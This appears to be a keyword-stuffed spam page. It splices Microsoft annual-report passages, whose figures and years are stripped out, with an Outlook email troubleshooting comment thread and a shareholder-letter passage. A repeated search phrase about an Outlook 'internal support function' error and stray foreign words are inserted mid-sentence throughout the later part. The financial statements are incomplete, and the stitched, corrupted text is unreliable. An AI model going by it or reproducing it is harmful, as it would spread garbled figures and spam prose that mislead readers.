In addition to our main research and development operations, we also operate Microsoft Research. We market and distribute our products and services through the following channels: OEMs, direct, and distributors and resellers. Our sales force performs a variety of functions, including working directly with enterprises and public-sector organizations worldwide to identify and meet their technology requirements; managing OEM relationships; and supporting system integrators, independent software vendors, and other partners who engage directly with our customers to perform sales, consulting, and fulfillment functions for our products and services.

We distribute our products and services through OEMs that pre-install our software on new devices and servers they sell. The largest component of the OEM business is the Windows operating system pre-installed on devices. OEMs also sell devices pre-installed with other Microsoft products and services, including applications such as Office and the capability to subscribe to Office There are two broad categories of OEMs.

The second broad category of OEMs are system builders consisting of lower-volume PC manufacturers, which source Microsoft software for pre-installation and local redistribution primarily through the Microsoft distributor channel rather than through a direct agreement or relationship with Microsoft.

Microsoft offers direct sales programs targeted to reach small, medium, and corporate customers, in addition to those offered through the reseller channel. A large network of partner advisors support many of these sales. We also sell commercial and consumer products and services directly to customers, such as cloud services, search, and gaming, through our digital marketplaces, online stores, and retail stores.

Although each type of reselling partner may reach organizations of all sizes, LSPs are primarily engaged with large organizations, distributors resell primarily to VARs, and VARs typically reach small and medium organizations. ESAs are also typically authorized as LSPs and operate as resellers for our other volume licensing programs. Microsoft Cloud Solution Provider is our main partner program for reselling cloud services. We distribute our retail packaged products primarily through independent non-exclusive distributors, authorized replicators, resellers, and retail outlets.

Individual consumers obtain these products primarily through retail outlets. We distribute our devices through third-party retailers. We have a network of field sales representatives and field support personnel that solicit orders from distributors and resellers, and provide product training and sales support.

Our Dynamics business solutions are also licensed to enterprises through a global network of channel partners providing vertical solutions and specialized services. We offer options for organizations that want to purchase our cloud services, on-premises software, and Software Assurance. We license software to organizations under volume licensing agreements to allow the customer to acquire multiple licenses of products and services instead of having to acquire separate licenses through retail channels.

We use different programs designed to provide flexibility for organizations of various sizes. While these programs may differ in various parts of the world, generally they include those discussed below.

SA conveys rights to new software and upgrades for perpetual licenses released over the contract period. It also provides support, tools, and training to help customers deploy and use software efficiently. SA is included with certain volume licensing agreements and is an optional purchase with others.

Enterprise Agreements offer large organizations a manageable volume licensing program that gives them the flexibility to buy cloud services and software licenses under one agreement. Enterprise Agreements are designed for medium or large organizations that want to license cloud services and on-premises software organization-wide over a three-year period. Organizations can elect to purchase perpetual licenses or subscribe to licenses. SA is included. Microsoft Product and Services Agreements are designed for medium and large organizations that want to license cloud services and on-premises software as needed, with no organization-wide commitment, under a single, non-expiring agreement.

Organizations purchase perpetual licenses or subscribe to licenses. SA is optional for customers that purchase perpetual licenses. Open agreements are a simple, cost-effective way to acquire the latest Microsoft technology. Open agreements are designed for small and medium organizations that want to license cloud services and on-premises software over a one- to three-year period. Under the Open agreements, organizations purchase perpetual licenses and SA is optional.

Under Open Value agreements, organizations can elect to purchase perpetual licenses or subscribe to licenses and SA is included. Select Plus agreements are designed for government and academic organizations to acquire on-premises licenses at any affiliate or department level, while realizing advantages as one organization.

Organizations purchase perpetual licenses and SA is optional. In July , we announced the retirement over a two-year period of Select Plus agreements for commercial organizations. Beginning July , no new Select Plus agreements were signed with commercial organizations. Microsoft Online Subscription Agreements are designed for small and medium organizations that want to subscribe to, activate, provision, and maintain cloud services seamlessly and directly via the web.

The agreement allows customers to acquire monthly or annual subscriptions for cloud-based services. The Microsoft Cloud Solution Provider program offers customers an easy way to license the cloud services they need in combination with the value-added services offered by their systems integrator, hosting partner, or cloud reseller partner.

Partners in this program can easily package their own products and services to directly provision, manage, and support their customer subscriptions. The Microsoft Services Provider License Agreement allows service providers and independent software vendors who want to license eligible Microsoft software products to provide software services and hosted applications to their end customers.

Partners license software over a three-year period and are billed monthly based on consumption. The Independent Software Vendor Royalty program enables partners to integrate Microsoft products into other applications and then license the unified business solution to their end users. Our customers include individual consumers, small and medium organizations, large global enterprises, public-sector institutions, internet service providers, application developers, and OEMs.

Our practice is to ship our products promptly upon receipt of purchase orders from customers; consequently, backlog is not significant. As of June 30, , we employed approximately , people on a full-time basis, 78, in the U. Of the total employed people, 42, were in operations, including manufacturing, distribution, product support, and consulting services; 42, were in product research and development; 36, were in sales and marketing; and 11, were in general and administration.

Certain of our employees are subject to collective bargaining agreements. Our Internet address is www. At our Investor Relations website, www. Our goal is to maintain the Investor Relations website as a portal through which investors can easily find or navigate to pertinent information about us, including:. The information found on our website is not part of this or any other report we file with, or furnish to, the SEC.

In addition to these channels, we use social media to communicate to the public. It is possible that the information we post on social media could be deemed to be material to investors. We encourage investors, the media, and others interested in Microsoft to review the information we post on the social media channels listed on our Investor Relations website. We generate revenue by licensing and supporting an array of software products; offering a wide range of cloud-based and other services to people and businesses; designing, manufacturing, and selling devices; and delivering relevant online advertising to a global audience.

Our most significant expenses are related to compensating employees; designing, manufacturing, marketing, and selling our products and services; datacenter costs in support of our cloud-based services; and income taxes. On June 4, , we entered into a definitive agreement to acquire GitHub, Inc. LinkedIn has been included in our consolidated results of operations since the date of acquisition.

We adopted the new accounting standards for revenue recognition and leases effective July 1, These new standards had a material impact in our consolidated financial statements. Beginning in fiscal year , our financial results reflect adoption of the standards with prior periods restated accordingly. Our industry is dynamic and highly competitive, with frequent changes in both technologies and business models.

Each industry shift is an opportunity to conceive new products, new technologies, or new ideas that can further transform the industry and our business. At Microsoft, we push the boundaries of what is possible through a broad range of research and development activities that seek to identify and address the changing demands of customers and users, industry trends, and competitive forces. The markets for software, devices, and cloud-based services are dynamic and highly competitive.

Our competitors are developing new software and devices, while also deploying competing cloud-based services for consumers and businesses. We must continue to evolve and adapt over an extended time in pace with this changing environment. The investments we are making in infrastructure and devices will continue to increase our operating costs and may decrease our operating margins. Our success is highly dependent on our ability to attract and retain qualified employees.

We hire a mix of university and industry talent worldwide. Aggregate demand for our software, services, and devices is correlated to global macroeconomic and geopolitical factors, which remain dynamic.

Our international operations provide a significant portion of our total revenue and expenses. Many of these revenue and expenses are denominated in currencies other than the U. As a result, changes in foreign exchange rates may significantly affect revenue and expenses. Strengthening of the U. This trend reversed in fiscal year Strengthening of foreign currencies relative to the U.

Refer to Risk Factors in our fiscal year Form K for a discussion of these factors and other risks. We expect our revenue to fluctuate quarterly and to be higher in the second and fourth quarters of our fiscal year. Second quarter revenue is driven by corporate year-end spending trends in our major markets and holiday season spending by consumers, and fourth quarter revenue is driven by the volume of multi-year on-premises contracts executed during the period.

We report our financial performance based on the following segments: Productivity and Business Processes, Intelligent Cloud, and More Personal Computing. Additional information on our reportable segments is contained in Note 21 — Segment Information and Geographic Data of the Notes to Financial Statements.

Consolidated results of operations include LinkedIn results since the date of acquisition on December 8, Fiscal year includes a full period of LinkedIn results, whereas fiscal year only includes results from the date of acquisition. Productivity and Business Processes revenue increased, driven by LinkedIn and higher revenue from Office. Intelligent Cloud revenue increased, primarily due to higher revenue from server products and cloud services. More Personal Computing revenue increased, driven by higher revenue from Gaming, Windows, Search advertising, and Surface, offset in part by lower revenue from Phone.

Gross margin percentage increased slightly, driven by favorable segment sales mix and gross margin percentage improvement in More Personal Computing. Gross margin included a 7 percentage point improvement in commercial cloud, primarily from Azure. Productivity and Business Processes revenue increased, driven by the acquisition of LinkedIn and higher revenue from Microsoft Office.

More Personal Computing revenue decreased, mainly due to lower revenue from Devices, offset in part by higher revenue from Windows and Search advertising. Gross margin percentage increased slightly due to a margin percent increase in More Personal Computing and segment sales mix, offset in part by margin percent declines in Productivity and Business Processes and Intelligent Cloud. Gross margin percentage includes a 5 percentage point improvement in commercial cloud gross margin primarily across Azure and Office Key changes in expenses were:.

Corporate and Other operating loss is comprised of corporate-level activity not specifically allocated to a segment, including impairment and restructuring expenses. Research and development expenses include payroll, employee benefits, stock-based compensation expense, and other headcount-related expenses associated with product development.

Research and development expenses also include third-party development and programming costs, localization costs incurred to translate software for international markets, and the amortization of purchased software code and services content. Sales and marketing expenses include payroll, employee benefits, stock-based compensation expense, and other headcount-related expenses associated with sales and marketing personnel, and the costs of advertising, promotions, trade shows, seminars, and other programs.

General and administrative expenses include payroll, employee benefits, stock-based compensation expense, severance expense, and other headcount-related expenses associated with finance, legal, facilities, certain human resources and other administrative personnel, certain taxes, and legal and other administrative fees.

Impairment and restructuring expenses include costs associated with the impairment of intangible assets related to our Phone business, and employee severance expenses and other costs associated with the consolidation of facilities and manufacturing operations related to restructuring activities.

We use derivative instruments to: manage risks related to foreign currencies, equity prices, interest rates, and credit; enhance investment returns; and facilitate portfolio diversification. Gains and losses from changes in fair values of derivatives that are not designated as hedges are primarily recognized in other income expense , net. Dividends and interest income increased primarily due to higher average portfolio balances and yields on fixed-income securities.

Interest expense increased primarily due to higher average outstanding long-term debt and higher finance lease expense. Net recognized gains on investments decreased primarily due to higher losses on sales of fixed-income securities, offset in part by higher gains on sales of equity securities. Net losses on derivatives decreased primarily due to lower losses on equity, foreign exchange, and commodity derivatives, offset in part by losses on interest rate derivatives in the current period as compared to gains in the prior period.

Dividends and interest income increased primarily due to higher portfolio balances and yields on fixed-income securities. Interest expense increased primarily due to higher outstanding long-term debt. Net recognized gains on investments increased primarily due to higher gains on sales of equity securities. Net losses on derivatives increased due to higher losses on equity derivatives, offset in part by lower losses on commodity and foreign currency derivatives.

Other, net reflects recognized losses from certain joint ventures and divestitures. The increase in our effective tax rate for fiscal year compared to fiscal year was primarily due to the net charge related to the enactment of the TCJA in fiscal year and the realization of tax benefits attributable to previous Phone business losses in fiscal year Our effective tax rate was higher than the U. The mix of income before income taxes between the U. In fiscal year , our U. The decrease in our effective tax rate for fiscal year compared to fiscal year was primarily due to the realization of tax benefits attributable to previous Phone business losses, offset in part by changes in the mix of our income before income taxes between the U.

Our effective tax rate was lower than the U. The TCJA required us to incur a one-time transition tax on deferred foreign income not previously subject to U. For fiscal year , our blended U. The TCJA was effective in the second quarter of fiscal year Due to the timing of the enactment and the complexity in applying the provisions of the TCJA, the provisional net charge is subject to revisions as we continue to complete our analysis of the TCJA, collect and prepare necessary data, and interpret any additional guidance issued by the U.

Adjustments may materially impact our provision for income taxes and effective tax rate in the period in which the adjustments are made. Our accounting for the estimated tax effects of the TCJA will be completed during the measurement period, which is not expected to extend beyond one year from the enactment date.

While we settled a portion of the IRS audit for tax years to during the third quarter of fiscal year , and a portion of the IRS audit for tax years to during the first quarter of fiscal year , we remain under audit for those years. In the second quarter of fiscal year , we settled a portion of the IRS audit for tax years to We continue to be subject to examination by the IRS for tax years to In February , the IRS withdrew its Revenue Agents Report for tax years to and reopened the audit phase of the examination.

As of June 30, , the primary unresolved issue relates to transfer pricing, which could have a significant impact in our consolidated financial statements if not resolved favorably. We believe our allowances for income tax contingencies are adequate. We have not received a proposed assessment for the unresolved issues and do not expect a final resolution of these issues in the next 12 months.

Based on the information currently available, we do not anticipate a significant increase or decrease to our tax contingencies for these issues within the next 12 months. We are subject to income tax in many jurisdictions outside the U. Our operations in certain jurisdictions remain subject to examination for tax years to , some of which are currently under audit by local tax authorities. The resolution of each of these audits is not expected to be material to our consolidated financial statements.

Adjusted operating income, net income and diluted earnings per share are non-GAAP financial measures which exclude the net charge related to the TCJA, and impairment and restructuring expenses. We believe these non-GAAP measures aid investors by providing additional insight into our operational performance and help clarify trends affecting our business.

These non-GAAP financial measures presented should not be considered a substitute for, or superior to, the measures of financial performance prepared in accordance with GAAP. Our short-term investments are primarily intended to facilitate liquidity and capital preservation. They consist predominantly of highly liquid investment-grade fixed-income securities, diversified among industries and individual issuers.

The investments are predominantly U. Our fixed-income investments are exposed to interest rate risk and credit risk. The credit risk and average maturity of our fixed-income portfolio are managed to achieve economic returns that correlate to certain fixed-income indices. The settlement risk related to these investments is insignificant given that the short-term investments held are primarily highly liquid investment-grade fixed-income securities.

As a result of the TCJA, our cash, cash equivalents, and short-term investments held by foreign subsidiaries are no longer subject to U.

In general, and where applicable, we use quoted prices in active markets for identical assets or liabilities to determine the fair value of our financial instruments. This pricing methodology applies to our Level 1 investments, such as U. If quoted prices in active markets for identical assets or liabilities are not available to determine fair value, then we use quoted prices for similar assets and liabilities or inputs other than the quoted prices that are observable either directly or indirectly.

This pricing methodology applies to our Level 2 investments such as corporate notes and bonds, foreign government bonds, mortgage- and asset-backed securities, commercial paper, certificates of deposit, and U. Level 3 investments are valued using internally developed models with unobservable inputs. Assets and liabilities measured at fair value on a recurring basis using unobservable inputs are an immaterial portion of our portfolio.

A majority of our investments are priced by pricing vendors and are generally Level 1 or Level 2 investments as these vendors either provide a quoted market price in an active market or use observable inputs for their pricing without applying significant adjustments.

Broker pricing is used mainly when a quoted price is not available, the investment is not priced by our pricing vendors, or when a broker price is more reflective of fair values in the market in which the investment trades.

Our broker-priced investments are generally classified as Level 2 investments because the broker prices these investments based on similar assets without applying significant adjustments. In addition, all our broker-priced investments have a sufficient level of trading volume to demonstrate that the fair values used are appropriate for these investments.

Our fair value processes include controls that are designed to ensure appropriate fair values are recorded. These controls include model validation, review of key model inputs, analysis of period-over-period fluctuations, and independent recalculation of prices where appropriate. We issued debt to take advantage of favorable pricing and liquidity in the debt markets, reflecting our credit rating and the low interest rate environment.

The proceeds of these issuances were or will be used for general corporate purposes, which may include, among other things, funding for working capital, capital expenditures, repurchases of capital stock, acquisitions, and repayment of existing debt.

Unearned revenue is generally billed upfront at the beginning of each annual coverage period for multi-year agreements and recognized ratably over the coverage period. Unearned revenue also includes payments for other offerings for which we have been paid in advance and earn the revenue when we transfer control of the product or service.

If I send myself an email from an email account of still function emails after the hosting transfer, I receive this message:.

A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address es failed:. LMTP error after end of data: 5. Sorry for the problem with setting up your email clients for 2 of your sites. My first comment will be that our live technical support team would be best equipped to aid you in seeing if your email issues are server related, or something related to the email client setup.

Though, if webmail is working, then generally the issue is not server related. I recommend the following:. It is possible to move one and not the other. If the nameservers for your hosting service are all pointed to the new hosting server, then DNS will be managed in the new location.

If not, then these settings are handled remotely. I know this is very redundant, but your settings should reflect the protocol you are using POP or IMAP , the ports being used there 2 main types secure and insecure and make sure that authentication criteria typically, the user name and password are correct. If there is, it may be trying to use your OLD settings and throwing up errors. If your email is confirmed to be normally working at the hosting service, then you may need to contact Microsoft.

Sometimes, the problem is something that needs to be cleared in Outlook itself. Sorry to say that the older versions of Outlook might be the source of the problem, but it is possible since you are using an year old version of the software.

It appears as though you are using a Gmail account with POP. I tried many times to reset my password but it keeps on coming.

I recommend removing and adding the account to your Outlook. However, if you are using POP you may lose any emails that are not stored on the server. If you are using IMAP this will not happen and you can remove and add the account to ensure that all the settings are entered correctly. Since this is our public forum, we cannot provide account specific information. Inbox alone is not updating in outlook while configuring yahoo mil.

Sent items got updating in outlook. Pl provide the solution for this. This guide is intended to assist you with configuring Outlook using the Settings that work for InMotion Hosting servers. We are happy to help you troubleshoot further, but will need a full example of the error and returned email headers. Thank you, John-Paul. This articule mentions nothing about setting up the folders dictated from the pst files.

I had it working fine for 2 weeks until I followed your steps to add additional accounts. Now, NONE are functioning. Then you will be able to use the account tree listing to map the folder you want to save the Sent items to. Unfortunately, I was unable to locate the settings for Drafts and Trash in Outlook However, during my investigation, it seems this functionality is improved in Outlook I hope this helps!

Since Mar 22, , my Outlook in my laptop is not downloading any incoming emails. However, I am able to send emails from my laptop. I checked the mail account settings on my Outlook in my laptop and the test was successful. Could you please help? Please refer to the troubleshooting portion of our email guides as they may help to identify the issue.

If you continue to have problems we recommend that you contact our live technical support team. Their contact information is at the bottom of the page. I have one perticuler persion create a folder when he was send me to one mail so I have receive three mail so pls guide me to solve this problem.

Can you explain the details of your circumstances so I can further offer some assistance? I am having a problem with my 0utlook email. My incoming and outgoing emails seems to have interchanged names. I am finding it difficult to tell which emails are from my clients as they are coming in with my domain name instead of the clients name.

When i send an email to a someone and i leave a copy, the copy comes to my inbox as the other person name. Thanks for the question about your Outlook email. First of all, there is only ONE official email name for an email account. Servers identify the sending or receiving account by the email name. Note that posts are public domain on the support center.

If you wish to handle this privately, then please contact our live technical support team using the contact information below. I cannot find all my email address records which have been previously created and saved in Outlook Express when I switched to using Outlook My Outlook Address Book is empty.

If you continue to have problems with the issue our recommendation is to contact Microsoft support in order to determine your next steps. I have been using M Outlook 07 for 3 years. Previously, to delete an item. I hit the delete icon and the item disappeared from the inbox. I should say that this began after I moved an signed with a different server.

What is going on? It is likely a certain feature that may have been enabled. It would be best to check with Microsoft support. I am getting this error while trying to test account settings, Log onto incoming mail server POP3 : Cannot find the e-mail server.

Verify the server information in your account properties. I have done all the settings correctly. Sorry for the problems with the mail settings. If you log in to your cPanel and go to mail, there is an option for configuring the mail client for email account. Check the settings there. Additionally, check to see if webmail is working for that account. If webmail is working, then the email account is setup correctly. I use an Acer PC with Windows i.

Since we switched, we have not been able to send or receive emails from our Outlook account. If you need more information, let me know. Thanks in advance for your help. Sorry for the issues with your email. You need to properly configure your email client regardless of ISP in order to access email. If you are using our servers for your email, then you can find your settings by reviewing this article.

My outloook is downloading only Inbox mails skipping all the folders. What am i doing wrong here?? You will want to contact Live Support for account-specific assistance with your Outlook connection settings. Thanks for your responce, but still we are facing the same problem for not for a single person, it is for multiple people. So request you to please help us in this regards. Santoshi, at this point you should probably reach out to your Support Department with your email provider.

They should be able to look at the logs and determine why. Log onto incoming mail server POP3 : Your e-mail server rejected your login. Verify your user name and password in your account properties.

Under Tools, click E-mail accounts. Send test e-mail message: Your e-mail server rejected your login. This error says the server is rejecting your login information.

You need to be sure you are using the correct hostname, username, and password. Using the correct information should correct the issue. I can not find them and they are not in an archive folder? Stuart, it sounds like either there is a display issue with Outlook, or the emails may be missing. I recommend contacting Microsoft, and possibly your email host. Since two days my outlook is asking me enter the password while i am entering the pasword its asking me again enter the pasword i am sure the pasword is coryect what can i do asist me please.

I configure roundcube in outlook through POP but thers no mail left in roundcube, all mails have been moved to outlook instead of copy. I want that mail copy in outlook from round cube ID instead of moved. POP removes the mail from the server by default.

Check into the settings for Outlook and there should be a setting to check for leaving email on the server. I have configured my email with Ms outlook i have used to log in without problem today it bring me an error that your log in has been rejected by server, I have investigated and discover that I cannot receive any email I only send. My other hot mail account is hooked to the Excahnge with no probleem.

Here is a helpful link to the official outlook guide on Switch between working offline and online. Send test e-mail message: Cannot find the e-mail server. Confirm your email settings are entered correctly and are free of misspellings. You can view our email settings in cPanel at any time. Check your mx records to ensure they are pointed to the correct server. Check your mail logs record of your connection, or additional errors.

I recive my mails but mails are not going. Kindly help out. Your incoming and outgoing mail server is anything that points to your account, typically. Its your domain name or ip address of the server. If your Outlook email client is properly configured to send email from the same mail server that your webmail service is attached to, then the outgoing email should be tracked at the server since it is sending the email — not Outlook.

Make sure that your outgoing email is subscribed to the sent messages. Also, depending on your webmail client, you may have the same option to subscribe to folders there this is possible in RoundCube. Everything fine. Do I lose all preveious emails or those would be stay safe in my local system? IMAP setups do not store the emails on your server, but sync with the server. To move emails from one server to another, you will want to use a client to do it. We have an article on how to move emails from one IMAP server to another.

I just started using outlook 7 for a new email and have noticed that I am not getting all emails…. I advise you make sure that your domain is pointing to our servers. If you use our email settings for Outlook then you must make sure the domain is pointing to us. Otherwise, if the mail was sent to a non-existent mailbox most email providers would have notified the senders and they could re-send.

If a message is lost, however, it cannot be recovered. I have an email account and I created some folders. After checking an incoming email, I am moving that email to my desired folder. Like this all my checked emails will be stored in folders only.

Recently I created an outlook account for this email. After completion of seting up in outlook, all the emails are imported to my Inbox folder of outlook as unread. In my email server Inbox, there are some emails I already read. Thease are aslo shown as unread in outlook. Please help how to import all folders as in my email server account. Thank you for contacting us. The method in the article for will be similar. By default, a POP3 setup will pull the emails off the server so that they only appear on the device that checked it.

If you have any other devices that check the email, they will not see them. IMAP allows Outlook to mirror what is on the server, for folders other than the Inbox, they need to be subscriubed to in order to see them.

The emails are not pulled off the server so this is good if you check your email from multiple devices PC, phone, tablet, work, other PCs, etc. As you are asking about folders that are on the server, it seems that may be the setup that will work best for you. Is that what you are trying to accomplish? Kindly assis. Basically, the error message is saying that Outlook cannot connect to the outgoing server. That will happen most frequently when the configuration is not correctly set.

I hope this helps to answer your question, please let us know if you require any further assistance. Setting up Live. The target principal is incorrect?? Please, any help would be appreciated — I have never faced this before- New laptop windows 8. Sorry for the problem with setting up your Live. However, if you were trying to setup an email account created with InMotion, then you can find your email settings here. However, if you can see the server name on the certificate and it matches your setting, then it will be okay.

You can approve it and there will be no problem. Where can I find the right server or domain? Thanks for the help. You can view your email settings directly in cPanel. I mapped my webmail server to my outlook using IMAP.. This will provide specific clues on where your connection is stopping. We also have a guide on How to read a Traceroute. But only emails after setting up outlook are displayed in the inbox. My old emails are not downloaded i think or displayed to outlook.

If you were using POP before, then your previous emails should be saved within your Outlook program. This is because POP removes emails from the server by default, and stores them in folders inside Outlook. Is there a way i can stop this from happening? Or is it simply a matter of updating from outlook to ? It is possible your POP configuration is causing this problem. I would first check all the POP devices, to see if they are set to leave a copy on the server.

It is possibly pushing copies of emails back onto the server that were previously deleted via IMAP accounts. Be careful however, if you do not leave a copy on the server POP will remove all emails by default.

This will store the emails on the server, and allow everyone to see the same folders. We do not have copies of Outlook to test, but if memory serves, there is an option in the left top menu that allows you to select which account you are viewing. I do have a link to an official Microsoft Outlook article that may help.

I would double-check your gmail password for misspellings, or possibly reset your password. Thank you for your question. I found a post on the official Outlook site, where they discuss the setting:.

In Outlook select Tools 2. Account Settings 3. More settings 5. Advanced 6. In steo 6, make sure you check leave a copy of messages on server box or adjust to as many days as required for emails to be left on the server. You need to look at the rules. We do not have control over that as that is specifically a mail client issue. I have three folder saperatly with different names. If one email contins with this three names, the mail coming three times to all folders.

If it is two emails then coming two time. How to rectify the same. Above steps is helpful for setting-up Outlook as an email client.

I have set up tmy gmail account iMAP in outlook , get one folder inunder gmail as all mail and another as In box. Check out this article about changing a setting in Outlook for this issue. The setup went fine without any errors …but the issue I face is this :. My inbox email in webmail is now empty and all emails have moved to outlook inbox. How do I fix this to ensure inbox stays in both webmail and outlook.

It sounds like you setup your Outlook as POP, which removes emails from the server by default. IMAP leaves the emails on the server by default, and allows all clients to see the same folders. This allows you to see the folders. Another lady in the office has outlook 7. How does she get that back? Right click on any of the headers at the top of the list of e-mail messages and select Customize Current View and then click the Fields button. Here you will see the available fields in the left hand column and the fields you are currently using.

Outlook cannot synchronize the suscribed folder for a particular account currently i am trying to setup. How could i solve it? Is it one particular folder on one particular account? If it is account specific you will want to contact our Live Support for assistance. Sorry for the problems with email. If all of your emails are being re-directed, then there may be an account re-direct on the account.

Since the account does not appear to be hosted with us, you will need to contact the mail admin or hosting account admin that is responsible for your email in order to properly determine the issue. If you do have an account with InMotion, please provide more information on the email account in question and we would be happy to look further into the issue for you. I have a work email account set up through my outlook, Is there any way to delete emails through my work email accessing it through the internet but KEEP them in my outlook?

As of right now, if I log into my work email through the internet and delete anything it also deletes in my outlook which I do not want. This means anything added or deleted on the server will duplicate on the Outlook.

If you set it up as POP3, then the Outlook will pull the email from the server and then it will exist on Outlook. I just got problem in my Outlook Yesterday at 3 pm, suddenly i got no incoming emails, but i got it smoothly on Tab or Blackberry. What happened with my outlook and what should I do to fix it?

Suddenly I got no new emails in Outlook Before so far was OK. I still get new emails at Tab and Blackberry. What happened with my Outlook and what should I do to fix it? Thanks alot…. Due to the fickleness of Outlook , it tends to be easier to remove the account from your outlook software and re-add your email address.

This can happen at times with windows security patches. Having a similar problem, only I am using live mail. I have to forward the mails from live mail which is on my old computer to my outlook account on my new one as outlook wont load files.

Can you please provide more details on the issue at hand? Have you tried removing the account from your email client and re-adding it using the steps above? Are you going through a local network? Also, be sure your Outgoing settings are set for Authentication. I can access my emails via webmail but they will not download into Outlook although I have set up Outlook a number of times. The password is correct as it lets me into my webmail. The computer is a new one.

Is it possible that the on-board virus checker is the problem? Any suggestions welcomed. Since webmail is working, you know the server is functioning correctly.

If you are being prompted for a password, normally this means Outlook is not authenticating with your server. I recommend checking all of your email settings for typos and misspellings. Next, try the alternate email settings.

If your problems persist, contact Live Support so they can review the email logs for issues, while you are connecting. Hello, yesterday I tried to setup a second email account in Outlook The first email I set up is working fine. I have tried 3 different times in 3 different ways to delete and then redo the gmail account for Outlook. It is still not showing up. Not sure what to do. I would start by restarting Outlook , and possibly the computer, if it has not been restarted recently.

This stops and starts all software cleanly, and can help fix simple software problems. You can view your email settings for Google here. Let us know what happens. If your email was hosted on our servers, we would next check the server logs for your incoming connection. However, I follow the instructions and the same thing happens again. Even though I had gotten out of Outlook, the outlook. When I killed that process, it allows me to continue on.

If your problems persist, you may have to reinstall Outlook, or contact your Email provider at the time you are setting up the account, so they can review the server logs for errors. I tried to add a new account beside the exchange already set up. And automatically cannot retrive parameters. Sorry for the continued problem. If that is the case, you will need to speak with your corporate IT department for further assistance. The instructions provided above will require that you have full access to make changes within your Outlook installation.

I cannot set the parameters of gmail manually. And automatically cannot retrive servers configurations. Sorry for the problems with setting up Microsoft Outlook for your Gmail account. Are you working with a new account?

Is there an account already setup in Outlook? You will need to be creating a NEW account in order to create an email account. If you continue to have problems, then please provide us any error messages and the steps leading up to where you are currently stuck.

I have seen this before, where an outgoing mail gets stuck and blocks the outgoing mail. If your problems persist, it may be easier to contact Live Support , so they can review the email logs.

First, make sure you have created the email accounts in cPanel. You can then view your specific email settings in cPanel at any time. My husband just got a new email address for a new job. It had to be set up as a pop account. We set up all ok but it is not showing up as a new email account down the side In the outlook

Outlook, Word Microsoft Editor gets an upgrade for Word and Outlook desktop clients. We are introducing a new click-to-review model for Editor’s spelling,grammar and advanced style suggestions. This change also includes a new dedicated card surface for reviewing the suggestions. Learn more. Outlook Pin your emails. May 08,  · I found another workaround to try. Open a new message, select To: change address book from “offline address book” to “distribution list”, select the list giving errors and press ok so it updates into the To: line. Sep 14,  · (b) (h) Revenue $ , $ 96, $ 91, $ 93, $ 86, Gross margin: 72, 62, driven by higher revenue from Premier Support Services and Microsoft Consulting Services, offset in part by a decline in revenue from custom support agreements. Deloitte & Touche LLP and the internal auditors each have full and.


Microsoft outlook 2016 an internal support function returned an error free.Import data from data sources (Power Query)


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You can freely use the academic papers written to you as they are страница and microsoft outlook 2016 an internal support function returned an error free referenced.

While the start of a new decade typically brings hope, we quickly saw the world come to a near standstill inconfronted by compounding crises: a public health and economic crisis, persistent issues of systemic racial injustice and inequity, and the devastating effects of climate change. But helplessness is corrosive to hope, and hope plus work is what is required.

And for that, I am optimistic. As a company, we are steadfast in our mission to empower every person and every organization on the planet to achieve more. Our mission is enduring. It drives who we are and everything we do, emphasizing our passion to empower both aj and the lasting institutions microsoft outlook 2016 an internal support function returned an error free build.

Although frree year has taught us that no business is percent resilient, those fortified by ссылка на продолжение technology are more resilient and more capable of transforming when faced with sweeping changes like those we are experiencing.

The way people interact with businesses is fundamentally shifting, and there is no going back. Digital technology is the most malleable tool ever created, and we believe that businesses that use returend to build their own digital capability will recover faster and emerge stronger. At Microsoft, we call this dynamic tech intensity : adopting best-in-class digital tools and platforms for the purpose of building new, proprietary products and services. We are living in the era of the microsoft outlook 2016 an internal support function returned an error free cloud and intelligent edge, which is being shaped by rapid advances in distributed computing, ambient intelligence, and multisense, multidevice experiences.

This means the microsoft outlook 2016 an internal support function returned an error free we go and the things we interact with will increasingly become digitized, creating new opportunities and new breakthroughs: from precision medicine to ah agriculture, from personalized e-commerce to personalized education, and from connected manufacturing floors to connected homes.

Our collective opportunity is to channel this intelligent cloud and intelligent edge era into tech intensity for every organization on the planet. Our customer tree areas were built for this era. They enable people, organizations, and entire industries to not only thrive but reimagine the world. So organizations can empower their employees, fostering a new culture for hybrid work; engage customers intelligently and virtually; transform products with new business models; and optimize operations to keep customers and employees safe and secure.

Across our customer microsoft outlook 2016 an internal support function returned an error free areas, we are expanding our opportunity to help every organization in every industry build their tech intensity—with a business model that internnal trusted and aligned with their success. More than ever, organizations are relying on Azure to stay up and running and support critical workloads, from healthcare triage with AI-assisted bots, to digital twins in manufacturing, to e-commerce in retail. Today, leaders in every industry—including 95 percent of the Fortune —run on Azure.

Fifty billion devices will come online byand Azure is the only cloud that extends to the edge, with consistency across operating models, development models, and infrastructure stack. Azure Arc enables organizations to deploy Azure services anywhere and extend Azure management to any infrastructure. Azure Stack Edge brings rapid machine learning inferencing closer to where data is generated, including the harshest of страница, like disaster response. Our acquisitions of Affirmed and Metaswitch, along with new Azure Edge Zones, expand our offerings for telecom operators as they move to 5G.

There will be zettabytes of data продолжитьrefurned processing this data in real time will be an imperative for every organization. At the data layer, Azure is the only cloud with limitless data and analytics capabilities. Azure Synapse brings together big data analytics and data warehousing, enabling data scientists to generate immediate insights from structured and unstructured data. And together with Azure 2061 Hyperscale, Cosmos DB, and our other data services, we are able to deliver a cloud-native data estate for every organization.

In AI, we have the most comprehensive portfolio of tools, frameworks, and infrastructure. Azure Cognitive Services makes it easier to build applications that see, hear, speak, microsoft templates free download 2019 free, understand, and accelerate decision-making.

Azure Machine Learning helps organizations build and deploy models faster, while ensuring they can do so responsibly and safely. And, we are pushing the bounds of how AI can generalize learning beyond narrow domains, collaborating with OpenAI on a supercomputing platform to train and run AI models of unprecedented scale. Their new GPT-3 model was trained on our Azure AI supercomputer and constitutes a new breakthrough in natural language understanding and generation, promising breakthrough scenarios within our products and those of our customers, when safely deployed.

Today, the majority of job openings for читать are outside the tech sector, and developers will increasingly drive and influence every business process and function. We have the most used and loved developer tools to build any app for any platform.

With GitHub, more than 50 million developers across 3 million organizations, including the majority of the Fortune 50, are able to como ativar 2017 free download and build software together. And, with Azure, they have best-in-class services to build cloud-native apps and modernize existing ones.

This year, we went further to give developers new tools to power remote development, productivity, and collaboration, wherever they are.

Codespaces brings together the best of GitHub, Visual Studio, and Azure to help developers go from code to cloud in seconds. VS Live Share enables real-time collaboration between developers, regardless of their location. And with Azure Communications Microsoft outlook 2016 an internal support function returned an error free, any developer can integrate rich communications APIs into their applications across any device, on any platform, using the same reliable and secure infrastructure that powers Teams.

